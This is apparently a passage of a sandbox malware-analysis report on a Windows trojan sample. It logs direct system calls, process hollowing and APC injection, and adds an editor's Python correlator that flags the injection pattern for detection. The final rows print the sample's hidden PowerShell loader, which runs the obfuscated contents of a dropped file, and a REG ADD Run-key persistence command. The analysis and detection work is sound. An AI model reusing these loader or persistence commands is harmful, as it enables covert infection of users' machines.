        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]8_2_204729A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204729A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204609AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204609AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20470A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20470A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050EA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DCA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DCA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204ECA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20484A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20484A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20460AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20494AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20494AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20534A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20498A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20468AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20468AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204B6AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050EB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2052AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20508B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20458B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20514B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20514B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20534B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20528B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20528B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050EBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204ECBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtOpenKeyEx: Direct from: 0x77672B9C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtProtectVirtualMemory: Direct from: 0x77672F9C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtCreateFile: Direct from: 0x77672FEC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtOpenFile: Direct from: 0x77672DCC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtProtectVirtualMemory: Direct from: 0x77667B2E
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtQueryInformationToken: Direct from: 0x77672CAC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtAllocateVirtualMemory: Direct from: 0x77672BEC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtDeviceIoControlFile: Direct from: 0x77672AEC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtQuerySystemInformation: Direct from: 0x776748CC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtQueryAttributesFile: Direct from: 0x77672E6C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtSetInformationThread: Direct from: 0x77672B4C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtOpenSection: Direct from: 0x77672E0C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtQueryVolumeInformationFile: Direct from: 0x77672F2C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtAllocateVirtualMemory: Direct from: 0x776748EC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtSetInformationThread: Direct from: 0x776663F9
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtReadVirtualMemory: Direct from: 0x77672E8C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtCreateKey: Direct from: 0x77672C6C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtWriteVirtualMemory: Direct from: 0x7767490C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtAllocateVirtualMemory: Direct from: 0x77673C9C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtDelayExecution: Direct from: 0x77672DDC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtCreateUserProcess: Direct from: 0x7767371C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtQuerySystemInformation: Direct from: 0x77672DFC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtQueryInformationProcess: Direct from: 0x77672C26
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtResumeThread: Direct from: 0x77672FBC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtReadFile: Direct from: 0x77672ADC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtAllocateVirtualMemory: Direct from: 0x77672BFC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtResumeThread: Direct from: 0x776736AC
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtSetInformationProcess: Direct from: 0x77672C5C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtMapViewOfSection: Direct from: 0x77672D1C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtNotifyChangeKey: Direct from: 0x77673C2C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtWriteVirtualMemory: Direct from: 0x77672E3C
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | NtCreateMutant: Direct from: 0x776735CC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 2180
Source: C:\Windows\SysWOW64\cmd.exe | Thread APC queued: target process: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Users\user\AppData\Local\Temp\Overfondle.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 1660000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 19FFF4
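The rows above describe three separate injection steps rather than one: powershell.exe unmaps the region at the default 32-bit image base (400000) of the suspended Overfondle.exe child and writes into it (process hollowing), Overfondle.exe and cmd.exe map sections with execute permission into the dropped payload, cmd.exe and firefox.exe, and cmd.exe then sets a thread context and queues an APC in the payload process. None of these events is conclusive on its own; what a detection should do is correlate them per (source, target) pair. The correlator below is an added example by the editor, not Joe Sandbox code: the event tuples are transcribed from the rows above (process names shortened, the PID-only target kept as the report gives it), and the technique names and the combination rules are the editor's assumptions.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

DEFAULT_IMAGE_BASE = 0x400000  # default image base of a 32-bit PE

# Names shortened from the report; the full dropped-file path is in the rows above.
STAGER = "powershell.exe"
LOADER = "Overfondle.exe"
PAYLOAD = "rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"

# (source, action, target, detail) tuples transcribed from the report rows.
# "pid:2180" stays as a PID because the page does not name that process.
EVENTS = [
    (LOADER, "section_mapped", PAYLOAD, "execute and read and write"),
    (LOADER, "section_mapped", "cmd.exe", "execute and read and write"),
    ("cmd.exe", "section_mapped", PAYLOAD, "read write"),
    ("cmd.exe", "section_mapped", PAYLOAD, "execute and read and write"),
    ("cmd.exe", "section_mapped", "firefox.exe", "read write"),
    ("cmd.exe", "section_mapped", "firefox.exe", "execute and read and write"),
    ("cmd.exe", "thread_context_set", "pid:2180", ""),
    ("cmd.exe", "apc_queued", PAYLOAD, ""),
    (STAGER, "section_unmapped", LOADER, "400000"),
    (STAGER, "memory_written", LOADER, "1660000"),
    (STAGER, "memory_written", LOADER, "19FFF4"),
]

Pair = Tuple[str, str]


def classify_injection(events) -> Dict[Pair, List[str]]:
    """Group cross-process memory events by (source, target) and name the
    injection technique that each pair's combination of events points to."""
    seen: Dict[Pair, set] = defaultdict(set)
    for src, action, tgt, detail in events:
        key = (src, tgt)
        if action == "section_mapped" and "execute" in detail:
            seen[key].add("rwx_map")
        elif action == "section_unmapped" and int(detail, 16) == DEFAULT_IMAGE_BASE:
            seen[key].add("unmap_image")
        elif action == "memory_written":
            seen[key].add("write")
        elif action == "apc_queued":
            seen[key].add("apc")
        elif action == "thread_context_set":
            seen[key].add("set_context")

    verdicts: Dict[Pair, List[str]] = {}
    for key, flags in seen.items():
        techniques: List[str] = []
        # Hollowing: the child's own image is unmapped at the default base and
        # the parent then writes a replacement into the child.
        if {"unmap_image", "write"} <= flags:
            techniques.append("process_hollowing")
        # APC injection: executable memory is placed in the target and a
        # user-mode APC is queued to run it. A bare executable mapping with no
        # trigger seen is reported on its own, since the trigger may simply
        # have been missed.
        if {"rwx_map", "apc"} <= flags:
            techniques.append("apc_injection")
        elif "rwx_map" in flags:
            techniques.append("rwx_section_mapping")
        if "set_context" in flags:
            techniques.append("thread_context_hijack")
        if "write" in flags and "process_hollowing" not in techniques:
            techniques.append("remote_memory_write")
        verdicts[key] = techniques
    return verdicts


if __name__ == "__main__":
    for (src, tgt), names in classify_injection(EVENTS).items():
        print(f"{src} -> {tgt}: {', '.join(names)}")
```

Feeding the same shape of events from EDR telemetry (NtUnmapViewOfSection, NtWriteVirtualMemory, NtMapViewOfSection with PAGE_EXECUTE_READWRITE, NtQueueApcThread, NtSetContextThread) reproduces the report's "hollowing", "APC queued" and "thread injection" signatures from raw events.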
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
